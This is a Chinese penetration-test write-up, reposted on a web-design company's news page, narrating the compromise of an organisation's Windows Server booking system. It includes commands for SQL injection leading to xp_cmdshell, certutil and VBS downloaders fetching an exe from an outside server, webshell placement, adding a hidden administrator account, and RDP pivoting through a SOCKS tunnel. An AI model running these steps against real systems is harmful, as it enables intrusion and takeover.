189 8069 5689

怎么进行简单的WinServer渗透

怎么进行简单的Win Server渗透,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

十余年的桦南网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。营销型网站的优势是能够根据用户设备显示端的尺寸不同,自动调整桦南建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。创新互联从事“桦南网站设计”,“桦南网站推广”以来,每个客户项目都认真落实执行。

0x00

对某单位的某主机系统一次渗透,敏感信息皆已打码

目标环境Windows Server 2008 R2 + IIS7.5 + ASP.NET2.0.50727

0x01

该系统为一个预约系统,先进行端口扫描,发现开放了很多端口,其中值得注意的135, 445, 3389端口被防火墙过滤,1433端口开放。爆破1433的sa密码往往很有难度,所以暂时先放着

怎么进行简单的Win Server渗透

0x02

手工测试功能点,fuzz发现几乎所有的SELECT SQL参数点都不可以注入,这时可以猜到后台使用了统一的查询方式(参数化或ORM),所以就没必要接着尝试SELECT参数了,可以转而将目光放在UPDATE或INSERT,说不定会有转机

果然,测试后发现用户邮箱修改处存在time-based盲注

怎么进行简单的Win Server渗透

这里对邮箱格式存在一个前端验证,简单绕过就可以了

怎么进行简单的Win Server渗透

之后getshell后查看源码也证实是由于UPDATE语句没有做参数化查询

0x03

SQLMap一把梭,先测试是否有DBA权限
很幸运

怎么进行简单的Win Server渗透

尝试直接使用xp_cmdshell组件执行命令,这里由于是sa用户,所以往往对应的系统权限也很高,这里直接就是SYSTEM权限

怎么进行简单的Win Server渗透

0x04

想继续发掘有用的信息,但发现一个问题,通过时间盲注来获取命令回显很慢,一条dir指令回显几乎需要5-10min,所以需要考虑获取一个WebShell或Meterpreter

WebShell由于不知道绝对路径且获取回显困难,所以暂且搁置

尝试从vps下载远控,certuril, vbs,无一例外失败了

// certutilcertutil -urlcache -split "http://1.1.1.1/1.exe"
// vbsecho set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d.vbs
cscript d.vbs http://1.1.1.1/1.exe C:Windowstemp1.exe

接下来需要确定是由于下载失败还是下载成功但被杀,尝试下载普通文本文件————成功。

接着尝试直接执行CS生成的ps1发现一样失败了,猜测是服务器的杀软进行了动态行为的二次确认

0x05

冷静下来再想想,接下来可以尝试写WebShell;或者找到SQL SERVER的配置文件,直接通过开放在公网的1433端口连接,然后xp_cmdshell执行命令(这个的回显当然比时间盲注快多了),但找配置文件的前提还是得找到WEB目录。通过已有的时间盲注来翻目录怕是得找一天,所以我需要通过尽可能少的回显来获知绝对路径

通过wmic先确定目标系统的所有盘符

wmic logicaldisk where DriveType=3 get DeviceID

怎么进行简单的Win Server渗透

接着通过web路径中某些特征文件名来通配查找

for /r C: %i in (dir1dir2special_name.asp*) do @echo %i
for /r C: %i in (dir1dir2special_name.asp*) do @echo %i

这里由于回显需要时间,就不在os-shell中复现了,通过AntSword演示

怎么进行简单的Win Server渗透

这里回显了7个路径,挨个尝试echo 1> xxxx1.txt,最后确定了WEB目录为E:Program files (x86)下的某目录

愉快的写入WebShell

怎么进行简单的Win Server渗透

连接

怎么进行简单的Win Server渗透

0x06

WebShell仅仅是iis权限,所以翻一翻配置文件

怎么进行简单的Win Server渗透

怎么进行简单的Win Server渗透

这个回显就方便多了

0x07

最开始扫目录有管理员登录后台,查询管理员密码,发现密码是80 bytes的加密字符串

怎么进行简单的Win Server渗透

没有找到源码的加密函数(部分源码只有binary没有.cs),如果有师父知道这是什么加密,欢迎交流

最后想了想,嗯,直接把我普通用户的加密密码插入admin表吧

怎么进行简单的Win Server渗透

成功登录后台

0x08

还记得目标开了3389,尝试连接

通过xp_cmdshell的SYSTEM权限添加用户

net user iv4n$ xxxxxxx /add

net localgroup administrators iv4n$ /add

怎么进行简单的Win Server渗透

但防火墙限制了3389的外网访问,尝试通过socks代理转发

(考虑到EXE需要免杀,所以本打算使用系统netsh组件端口转发,连接时却转发异常,之后使用reGeorge访问目标内网端口)

怎么进行简单的Win Server渗透

all seems fine, 测试一下没问题

怎么进行简单的Win Server渗透

编辑proxychains的配置为本地4444端口的socks4代理,通过proxychains套rdesktop连接

怎么进行简单的Win Server渗透

0x09

目标系统没有域环境,所以测试就到此为止了

关于怎么进行简单的Win Server渗透问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注创新互联行业资讯频道了解更多相关知识。


标题名称:怎么进行简单的WinServer渗透
文章路径:http://cdxtjz.cn/article/iphphe.html

其他资讯